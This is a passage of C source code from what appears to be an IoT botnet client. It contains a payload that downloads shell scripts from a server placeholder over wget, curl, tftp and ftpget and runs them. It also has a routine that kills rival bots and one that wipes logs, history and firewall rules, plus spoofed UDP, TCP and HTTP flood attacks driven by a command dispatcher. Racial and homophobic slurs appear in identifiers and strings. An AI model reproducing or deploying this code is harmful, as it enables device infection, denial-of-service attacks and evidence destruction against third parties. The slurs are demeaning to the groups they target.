  1807. sprintf(payload2, "%s cd /tmp; wget http://SERVERIP/bins.sh; curl -O http://SERVERIP/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp SERVERIP -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g SERVERIP; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 SERVERIP ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n x00", NETIS);
  1808. sendto(clientSocket,payload2,strlen(payload2),0,(struct sockaddr *)&serverAddr,addr_size);
  1809. }
  1810. }
  1811. //LOOPING PAYLOAD LOL IDFK WHY
  1812. void LoopPayload(){
  1813. int i;
  1814. for(i = 0; i < 9; i++){
  1815. system("cd /tmp; wget http://SERVERIP/bins.sh; curl -O http://SERVERIP/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp SERVERIP -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g SERVERIP; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 SERVERIP ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n");
  1816. return;
  1817. }
  1818. sleep(5);
  1819. }
  1820. //botkill
  1821. void botkiller(){
  1822. char* Niggerdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};//wtf are we doing here well these are the directory
  1823. char* Boats[] = {"wget", "armv*", "bot*", "ntpd*", "hackz*", "shitty*","jack*", "mips*", "sex*", "i86", "ssh*", "sh4*", "jackmeoff*", "tftp*", "i56", "mips", "mipsel", "sh4", "x86", "i686", "ppc", "i586", "i586"};
  1824. const char *bots[] = {"jackmy*", "busybox*", "bin*", "sex*", "tftp*", "arm*", "mipsel*", "mips*", "mips64*", "i686*","sparc*", "sh4*", "bot*", "jackmeoff*", "hackz*", "bruv*"};
  1825. char hacker[80];
  1826. char botkill[80];
  1827. char buf[128];
  1828. int i, num_tmps, j;
  1829. for(j = 0; j < num_tmps; j++)
  1830. {
  1831. memset(buf, 0, 128);
  1832. if(j == 0)
  1833. snprintf(buf, 127, ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d\r\n", Niggerdirs[j], Niggerdirs[j], Niggerdirs[j], Niggerdirs[j], bots[j]);
  1834. else
  1835. snprintf(buf, 127, ">%s.t && cd %s ; >retrieve\r\n", Niggerdirs[j], Niggerdirs[j], Niggerdirs[j]);
  1836. system(buf);
  1837. sprintf(botkill, "pkill -9 %s\r\n", bots[j]);
  1838. system(botkill);
  1839. return;
  1840. }
  1841. sleep(5);
  1842. }
  1843. //Cleaning Device
  1844. void RemoveTMP() {
  1845. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
  1846. system("rm -rf /var/log/wtmp");
  1847. system("history -c;history -w");
  1848. system("rm -rf /var/log/wtmp");
  1849. system("rm -rf /tmp/*");
  1850. system("history -c");
  1851. system("rm -rf ~/.bash_history");
  1852. system("rm -rf /bin/netstat");
  1853. system("history -w");
  1854. system("pkill -9 busybox");
  1855. system("pkill -9 perl");
  1856. system("service iptables stop");
  1857. system("/sbin/iptables -F;/sbin/iptables -X");
  1858. }
  1859. int socket_connect(char *host, in_port_t port) {
  1860. struct hostent *hp;
  1861. struct sockaddr_in addr;
  1862. int on = 1, sock;
  1863. if ((hp = gethostbyname(host)) == NULL) return 0;
  1864. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1865. addr.sin_port = htons(port);
  1866. addr.sin_family = AF_INET;
  1867. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1868. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1869. if (sock == -1) return 0;
  1870. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
  1871. return 0;
  1872. return sock;
  1873. }
  1874. void sendHTTP(void *host, char *method, in_port_t port, char *path, int timeFoo, int power) {
  1875. const char *useragents[] = {
  1876. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  1877. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  1878. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  1879. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  1880. "Opera/6.04 (Windows XP; U) [en]",
  1881. "Opera/9.99 (X11; U; sk)",
  1882. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  1883. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  1884. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  1885. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  1886. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  1887. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  1888. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  1889. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  1890. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  1891. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  1892. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  1893. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  1894. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  1895. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  1896. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  1897. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  1898. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  1899. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  1900. "wii libnup/1.0",
  1901. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  1902. "PSP (PlayStation Portable); 2.00",
  1903. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  1904. "Doris/1.15 [en] (Symbian)",
  1905. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  1906. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100"
  1907. "findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1908. "findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1909. "findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1910. "findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1911. "findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1912. "Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable",
  1913. "Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable",
  1914. "Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)",
  1915. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2",
  1916. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2",
  1917. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2",
  1918. "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)",
  1919. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3",
  1920. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1921. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1922. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1923. "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
  1924. "AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
  1925. "AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
  1926. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
  1927. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
  1928. "AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
  1929. "AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
  1930. "AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
  1931. "AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
  1932. "AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
  1933. "AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
  1934. "AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
  1935. "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
  1936. "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
  1937. "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
  1938. "MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
  1939. "MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
  1940. "Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
  1941. };
  1942. const char *connections[] = {"close", "keep-alive", "accept"};
  1943. int i, timeEnd = time(NULL) + timeFoo;
  1944. char request[512];
  1945. sprintf(request, "%s %s HTTP/1.1\r\nConnection: %s\r\nAccept: */*\r\nUser-Agent: %s\r\n", method, path, connections[(rand() % 3)], useragents[(rand() % 65)]);
  1946. for (i = 0; i < power; i++) {
  1947. if (fork()) {
  1948. while (timeEnd > time(NULL)) {
  1949. int socket = socket_connect((char *)host, port);
  1950. if (socket != 0) {
  1951. write(socket, request, strlen(request));
  1952. close(socket);
  1953. }
  1954. }
  1955. _exit(1);
  1956. }
  1957. }
  1958. }
  1959. void sendSTD(unsigned char *ip, int port, int secs) {
  1960. int iSTD_Sock;
  1961. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1962. time_t start = time(NULL);
  1963. struct sockaddr_in sin;
  1964. struct hostent *hp;
  1965. hp = gethostbyname(ip);
  1966. bzero((char*) &sin,sizeof(sin));
  1967. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1968. sin.sin_family = hp->h_addrtype;
  1969. sin.sin_port = port;
  1970. unsigned int a = 0;
  1971. while(1){
  1972. char *randstrings[] = {"arfgG", "HBiug655", "KJYDFyljf754", "LIKUGilkut769458905", "JHFDSkgfc5747694", "GJjyur67458", "RYSDk747586", "HKJGi5r8675", "KHGK7985i", "yuituiILYF", "GKJDghfcjkgd4", "uygtfgtrevf", "tyeuhygbtfvg", "ewqdcftr", "trbazetghhnbrty", "tbhrwsehbg", "twehgbferhb", "etrbhhgetrb", "edfverthbyrtb", "kmiujmnhnhfgn", "zcdbvgdfsbgfd", "gdfbtsdgb", "ghdugffytsdyt", "tgerthgwtrwry", "yteytietyue", "qsortEQS", "8969876hjkghblk", "std", "dts", "hackz", "shdyed", "http", "sghwiondc", "nigger", "pussy", "faggot"};
  1973. char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
  1974. if (a >= 50)
  1975. {
  1976. send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
  1977. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  1978. if (time(NULL) >= start + secs)
  1979. {
  1980. close(iSTD_Sock);
  1981. _exit(0);
  1982. }
  1983. a = 0;
  1984. }
  1985. a++;
  1986. }
  1987. }
  1988. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
  1989. {
  1990. struct sockaddr_in dest_addr;
  1991. dest_addr.sin_family = AF_INET;
  1992. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1993. else dest_addr.sin_port = htons(port);
  1994. if(getHost(target, &dest_addr.sin_addr)) return;
  1995. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1996. register unsigned int pollRegister;
  1997. pollRegister = pollinterval;
  1998. if(spoofit == 32)
  1999. {
  2000. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  2001. if(!sockfd)
  2002. {
  2003. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  2004. return;
  2005. }
  2006. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
  2007. if(buf == NULL) return;
  2008. memset(buf, 0, packetsize + 1);
  2009. makeRandomStr(buf, packetsize);
  2010. int end = time(NULL) + timeEnd;
  2011. register unsigned int i = 0;
  2012. while(1)
  2013. {
  2014. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2015. if(i == pollRegister)
  2016. {
  2017. if(port == 0) dest_addr.sin_port = rand_cmwc();
  2018. if(time(NULL) > end) break;
  2019. i = 0;
  2020. continue;
  2021. }
  2022. i++;
  2023. }
  2024. } else {
  2025. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  2026. if(!sockfd)
  2027. {
  2028. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  2029. return;
  2030. }
  2031. int tmp = 1;
  2032. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  2033. {
  2034. HackerPrint(D1ckSucka, "Failed setting raw headers mode.");
  2035. return;
  2036. }
  2037. int counter = 50;
  2038. while(counter--)
  2039. {
  2040. srand(time(NULL) ^ rand_cmwc());
  2041. init_rand(rand());
  2042. }
  2043. in_addr_t netmask;
  2044. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  2045. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  2046. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  2047. struct iphdr *iph = (struct iphdr *)packet;
  2048. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  2049. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( HackerScan2(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  2050. udph->len = htons(sizeof(struct udphdr) + packetsize);
  2051. udph->source = rand_cmwc();
  2052. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2053. udph->check = 0;
  2054. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  2055. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2056. int end = time(NULL) + timeEnd;
  2057. register unsigned int i = 0;
  2058. while(1)
  2059. {
  2060. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2061. udph->source = rand_cmwc();
  2062. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2063. iph->id = rand_cmwc();
  2064. iph->saddr = htonl( HackerScan2(netmask) );
  2065. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2066. if(i == pollRegister)
  2067. {
  2068. if(time(NULL) > end) break;
  2069. i = 0;
  2070. continue;
  2071. }
  2072. i++;
  2073. }
  2074. }
  2075. }
  2076. void sendCNC(unsigned char *ip,int port, int end_time)
  2077. {
  2078. int end = time(NULL) + end_time;
  2079. int sockfd;
  2080. struct sockaddr_in server;
  2081. server.sin_addr.s_addr = inet_addr(ip);
  2082. server.sin_family = AF_INET;
  2083. server.sin_port = htons(port);
  2084. while(end > time(NULL))
  2085. {
  2086. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  2087. connect(sockfd , (struct sockaddr *)&server , sizeof(server));
  2088. sleep(1);
  2089. close(sockfd);
  2090. }
  2091. }
  2092. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
  2093. {
  2094. register unsigned int pollRegister;
  2095. pollRegister = pollinterval;
  2096. struct sockaddr_in dest_addr;
  2097. dest_addr.sin_family = AF_INET;
  2098. if(port == 0) dest_addr.sin_port = rand_cmwc();
  2099. else dest_addr.sin_port = htons(port);
  2100. if(getHost(target, &dest_addr.sin_addr)) return;
  2101. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2102. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  2103. if(!sockfd)
  2104. {
  2105. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  2106. return;
  2107. }
  2108. int tmp = 1;
  2109. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  2110. {
  2111. HackerPrint(D1ckSucka, "Failed setting raw headers mode.");
  2112. return;
  2113. }
  2114. in_addr_t netmask;
  2115. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  2116. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  2117. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  2118. struct iphdr *iph = (struct iphdr *)packet;
  2119. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  2120. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( HackerScan2(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  2121. tcph->source = rand_cmwc();
  2122. tcph->seq = rand_cmwc();
  2123. tcph->ack_seq = 0;
  2124. tcph->doff = 5;
  2125. if(!strcmp(flags, "all"))
  2126. {
  2127. tcph->syn = 1;
  2128. tcph->rst = 1;
  2129. tcph->fin = 1;
  2130. tcph->ack = 1;
  2131. tcph->psh = 1;
  2132. } else {
  2133. unsigned char *pch = strtok(flags, ",");
  2134. while(pch)
  2135. {
  2136. if(!strcmp(pch, "syn"))
  2137. {
  2138. tcph->syn = 1;
  2139. } else if(!strcmp(pch, "rst"))
  2140. {
  2141. tcph->rst = 1;
  2142. } else if(!strcmp(pch, "fin"))
  2143. {
  2144. tcph->fin = 1;
  2145. } else if(!strcmp(pch, "ack"))
  2146. {
  2147. tcph->ack = 1;
  2148. } else if(!strcmp(pch, "psh"))
  2149. {
  2150. tcph->psh = 1;
  2151. } else {
  2152. HackerPrint(D1ckSucka, "Invalid flag \"%s\"", pch);
  2153. }
  2154. pch = strtok(NULL, ",");
  2155. }
  2156. }
  2157. tcph->window = rand_cmwc();
  2158. tcph->check = 0;
  2159. tcph->urg_ptr = 0;
  2160. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2161. tcph->check = tcpcsum(iph, tcph);
  2162. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2163. int end = time(NULL) + timeEnd;
  2164. register unsigned int i = 0;
  2165. while(1)
  2166. {
  2167. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2168. iph->saddr = htonl( HackerScan2(netmask) );
  2169. iph->id = rand_cmwc();
  2170. tcph->seq = rand_cmwc();
  2171. tcph->source = rand_cmwc();
  2172. tcph->check = 0;
  2173. tcph->check = tcpcsum(iph, tcph);
  2174. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2175. if(i == pollRegister)
  2176. {
  2177. if(time(NULL) > end) break;
  2178. i = 0;
  2179. continue;
  2180. }
  2181. i++;
  2182. }
  2183. }
  2184. void sendJUNK(unsigned char *ip, int port, int end_time)
  2185. {
  2186. int max = getdtablesize() / 2, i;
  2187. struct sockaddr_in dest_addr;
  2188. dest_addr.sin_family = AF_INET;
  2189. dest_addr.sin_port = htons(port);
  2190. if(getHost(ip, &dest_addr.sin_addr)) return;
  2191. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2192. struct state_t
  2193. {
  2194. int fd;
  2195. uint8_t state;
  2196. } fds[max];
  2197. memset(fds, 0, max * (sizeof(int) + 1));
  2198. fd_set myset;
  2199. struct timeval tv;
  2200. socklen_t lon;
  2201. int valopt, res;
  2202. unsigned char *watwat = malloc(1024);
  2203. memset(watwat, 0, 1024);
  2204. int end = time(NULL) + end_time;
  2205. while(end > time(NULL))
  2206. {
  2207. for(i = 0; i < max; i++)
  2208. {
  2209. switch(fds[i].state)
  2210. {
  2211. case 0:
  2212. {
  2213. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2214. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2215. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  2216. else fds[i].state = 1;
  2217. }
  2218. break;
  2219. case 1:
  2220. {
  2221. FD_ZERO(&myset);
  2222. FD_SET(fds[i].fd, &myset);
  2223. tv.tv_sec = 0;
  2224. tv.tv_usec = 10000;
  2225. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  2226. if(res == 1)
  2227. {
  2228. lon = sizeof(int);
  2229. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2230. if(valopt)
  2231. {
  2232. close(fds[i].fd);
  2233. fds[i].state = 0;
  2234. } else {
  2235. fds[i].state = 2;
  2236. }
  2237. } else if(res == -1)
  2238. {
  2239. close(fds[i].fd);
  2240. fds[i].state = 0;
  2241. }
  2242. }
  2243. break;
  2244. case 2:
  2245. {
  2246. makeRandomStr(watwat, 1024);
  2247. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
  2248. {
  2249. close(fds[i].fd);
  2250. fds[i].state = 0;
  2251. }
  2252. }
  2253. break;
  2254. }
  2255. }
  2256. }
  2257. }
  2258. void sendHOLD(unsigned char *ip, int port, int end_time)
  2259. {
  2260. int max = getdtablesize() / 2, i;
  2261. struct sockaddr_in dest_addr;
  2262. dest_addr.sin_family = AF_INET;
  2263. dest_addr.sin_port = htons(port);
  2264. if(getHost(ip, &dest_addr.sin_addr)) return;
  2265. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2266. struct state_t
  2267. {
  2268. int fd;
  2269. uint8_t state;
  2270. } fds[max];
  2271. memset(fds, 0, max * (sizeof(int) + 1));
  2272. fd_set myset;
  2273. struct timeval tv;
  2274. socklen_t lon;
  2275. int valopt, res;
  2276. unsigned char *watwat = malloc(1024);
  2277. memset(watwat, 0, 1024);
  2278. int end = time(NULL) + end_time;
  2279. while(end > time(NULL))
  2280. {
  2281. for(i = 0; i < max; i++)
  2282. {
  2283. switch(fds[i].state)
  2284. {
  2285. case 0:
  2286. {
  2287. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  2288. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  2289. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  2290. else fds[i].state = 1;
  2291. }
  2292. break;
  2293. case 1:
  2294. {
  2295. FD_ZERO(&myset);
  2296. FD_SET(fds[i].fd, &myset);
  2297. tv.tv_sec = 0;
  2298. tv.tv_usec = 10000;
  2299. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  2300. if(res == 1)
  2301. {
  2302. lon = sizeof(int);
  2303. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  2304. if(valopt)
  2305. {
  2306. close(fds[i].fd);
  2307. fds[i].state = 0;
  2308. } else {
  2309. fds[i].state = 2;
  2310. }
  2311. } else if(res == -1)
  2312. {
  2313. close(fds[i].fd);
  2314. fds[i].state = 0;
  2315. }
  2316. }
  2317. break;
  2318. case 2:
  2319. {
  2320. FD_ZERO(&myset);
  2321. FD_SET(fds[i].fd, &myset);
  2322. tv.tv_sec = 0;
  2323. tv.tv_usec = 10000;
  2324. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
  2325. if(res != 0)
  2326. {
  2327. close(fds[i].fd);
  2328. fds[i].state = 0;
  2329. }
  2330. }
  2331. break;
  2332. }
  2333. }
  2334. }
  2335. }
  2336. void processCmd(int argc, unsigned char *argv[])
  2337. {
  2338. int x;
  2339. if(!strcmp(argv[0], "PING"))
  2340. {
  2341. HackerPrint(D1ckSucka, "PONG!");
  2342. return;
  2343. }
  2344. if(!strcmp(argv[0], "GETLOCALIP"))
  2345. {
  2346. HackerPrint(D1ckSucka, "My IP: %s", inet_ntoa(ourIP));
  2347. return;
  2348. }
  2349. if(!strcmp(argv[0], "BOTKILL"))
  2350. {
  2351. if(!listFork())
  2352. {
  2353. HackerPrint(D1ckSucka, "Killing Bots");
  2354. botkiller();
  2355. RemoveTMP();
  2356. _exit(0);
  2357. }
  2358. }
  2359. if(!strcmp(argv[0], "LOOPME"))
  2360. {
  2361. if(!listFork())
  2362. {
  2363. HackerPrint(D1ckSucka, "LOOPING PAYLOAD");
  2364. LoopPayload();
  2365. _exit(0);
  2366. }
  2367. }
  2368. if(!strcmp(argv[0], "TELNET"))
  2369. {
  2370. if(argc != 2)
  2371. {
  2372. HackerPrint(D1ckSucka, "TELNET ON | OFF");
  2373. return;
  2374. }
  2375. if(!strcmp(argv[1], "OFF"))
  2376. {
  2377. if(scanPid == 0) return;
  2378. kill(scanPid, 9);
  2379. HackerPrint(D1ckSucka, " OFF");
  2380. scanPid = 0;
  2381. }
  2382. if(!strcmp(argv[1], "ON"))
  2383. {
  2384. if(scanPid != 0) return;
  2385. uint32_t parent;
  2386. parent = fork();
  2387. if (parent > 0) { scanPid = parent; return;}
  2388. else if(parent == -1) return;
  2389. StartTheLelz();
  2390. _exit(0);
  2391. }
  2392. }
  2393.  
  2394. if(!strcmp(argv[0], "NETIS"))
  2395. {
  2396. if(argc != 2)
  2397. {
  2398. return;
  2399. }
  2400. if(!strcmp(argv[1], "ON"))
  2401. {
  2402. HackerPrint(D1ckSucka, "[NETIS] SCANNER Starting");
  2403. StartTheNetis();
  2404. _exit(0);
  2405. }
  2406. }
  2407.  
  2408. if(!strcmp(argv[0], "HOLD"))
  2409. {
  2410. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2411. {
  2412. return;
  2413. }
  2414. unsigned char *ip = argv[1];
  2415. int port = atoi(argv[2]);
  2416. int time = atoi(argv[3]);
  2417. if(strstr(ip, ",") != NULL)
  2418. {
  2419. unsigned char *hi = strtok(ip, ",");
  2420. while(hi != NULL)
  2421. {
  2422. if(!listFork())
  2423. {
  2424. sendHOLD(hi, port, time);
  2425. _exit(0);
  2426. }
  2427. hi = strtok(NULL, ",");
  2428. }
  2429. } else {
  2430. if (listFork()) { return; }
  2431. sendHOLD(ip, port, time);
  2432. _exit(0);
  2433. }
  2434. }
  2435. if(!strcmp(argv[0], "JUNK"))
  2436. {
  2437. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2438. {
  2439. return;
  2440. }
  2441. unsigned char *ip = argv[1];
  2442. int port = atoi(argv[2]);
  2443. int time = atoi(argv[3]);
  2444. if(strstr(ip, ",") != NULL)
  2445. {
  2446. unsigned char *hi = strtok(ip, ",");
  2447. while(hi != NULL)
  2448. {
  2449. if(!listFork())
  2450. {
  2451. sendJUNK(hi, port, time);
  2452. close(D1ckSucka);
  2453. _exit(0);
  2454. }
  2455. hi = strtok(NULL, ",");
  2456. }
  2457. } else {
  2458. if (listFork()) { return; }
  2459. sendJUNK(ip, port, time);
  2460. _exit(0);
  2461. }
  2462. }
  2463. if(!strcmp(argv[0], "UDP"))
  2464. {
  2465. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
  2466. {
  2467. return;
  2468. }
  2469. unsigned char *ip = argv[1];
  2470. int port = atoi(argv[2]);
  2471. int time = atoi(argv[3]);
  2472. int spoofed = atoi(argv[4]);
  2473. int packetsize = atoi(argv[5]);
